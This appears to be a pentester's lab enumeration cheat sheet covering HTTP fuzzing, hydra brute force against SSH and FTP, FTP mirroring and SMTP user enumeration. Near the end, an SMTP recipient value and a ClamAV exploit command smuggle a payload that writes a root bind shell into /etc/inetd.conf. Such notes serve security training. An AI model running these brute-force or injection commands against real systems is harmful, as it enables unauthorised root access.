Manual

HTTP(s)

robots.txt

Boxe name? Like ClamAv?

source

inspect

domain?
    if found domain run scan again with domain
    DNS fuzz subdomains

HTTPS?
    if you find HTTPS, take a look at the certificate
    
nikto -ask=no -h http://192.168.81.56:8080 2>&1 | tee "tcp_8080_http_nikto.txt"

is it python?
    STI

Fuzz:
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
/usr/share/wordlists/dirbuster/directories.jbrofuzz
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

SSH

hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/user/PGAGAIN/Banzai/192.168.81.56/scans/tcp_22_ssh_hydra.txt" ssh://192.168.81.56

FTP

Anonymous login
    is the access able to upload to website?

ls -al
    to list all directory including ...
    
Bruteforce with:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 21 -o "/home/user/PGAGAIN/Banzai/192.168.81.56/scans/tcp_21_ftp_hydra.txt" ftp://192.168.81.56


wget -m ftp://anonymous:anonymous@192.168.234.110 #Donwload all
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all

SMTP


smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt" -t 192.168.81.56 -p 25 2>&1

smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -t 192.168.81.56 -p 25 2>&1

snmp-check 192.168.120.94

mail from:hell@gmail.com
nc -nv 192.168.89.42 31337
rcpt to: nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost

go run clamav.go -h 192.168.89.42 -p 25 -c "echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf"

Last updated

Was this helpful?